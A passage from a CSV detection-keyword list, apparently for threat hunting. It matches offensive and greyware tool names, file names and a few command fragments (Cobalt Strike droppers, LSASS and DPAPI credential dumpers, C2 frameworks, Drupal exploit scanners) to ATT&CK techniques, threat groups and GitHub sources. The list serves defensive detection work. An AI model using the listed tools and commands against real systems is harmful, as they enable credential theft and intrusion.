T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*Dr0p1t-Framework*","offensive_tool_keyword","Dr0p1t-Framework","Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .)","T1203 - T1005 - T1064","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/Dr0p1t-Framework","1","1","N/A","N/A","10","1333","402","2018-11-03T19:00:12Z","2017-02-11T21:24:11Z" +"*dr4k0nia/NixImports*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*DReverseProxy.git*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*DReverseServer.go*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*drgreenthumb93/CVE-2022-30190-follina*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" +"*DriverQuery.exe no-msft*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*drk1wi/Modlishka*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*droopescan scan drupal -u * -t 32*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Droopscan*","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","N/A","Web Attacks","https://github.com/droope/droopescan","1","0","N/A","N/A","10","1124","248","2023-06-02T14:21:16Z","2014-10-22T22:06:30Z" +"*drop_malleable_unknown_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_with_invalid_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_without_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dropboxC2.py*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dropper_cs.exe*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*dropper32.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*dropper64.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*drunkpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drunkpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drupal_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*drupwn --mode exploit --target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Drupwn*","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/immunIT/drupwn","1","0","N/A","N/A","6","543","132","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z" +"*dsquery * -filter *(objectClass=trustedDomain)* -attr *","greyware_tool_keyword","dsquery","enumerate domain trusts with dsquery","T1482 - T1018","TA0007","N/A","APT41 - FIN8","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dswmiexec.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*dtd-finder*","offensive_tool_keyword","dtd-finder","Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.","T1221 - T1228 - T1547","TA0005 - ","N/A","N/A","Exploitation tools","https://github.com/GoSecure/dtd-finder","1","0","N/A","N/A","6","551","100","2021-09-22T17:54:08Z","2019-07-15T20:13:54Z" +"*dtmsecurity/bof_helper*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","198","44","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" +"*dubmoat*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*Dubmoat_ExtractData*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*Dubmoat_PrintFilename*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*Dubmoat_TruncateFile*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*DueDLLigence.cs*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence.sln*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence-master*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*dump_chrome_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_CREDENTIAL_MSOFFICE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TASKSCHEDULER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TSE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_domain*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*dump_firefox_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_jenkins*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_keepassx*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_lsass*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*dump_lsass.js*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*dump_process(*lsass.exe*)*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*dump_sam(*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*dump_secrets.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*dump_ssh_keys*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_tomcat*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_VAULT_INTERNET_EXPLORER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_NGC_LOCAL_ACCOOUNT*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_WIN_BIO_KEY*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_webconf*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential 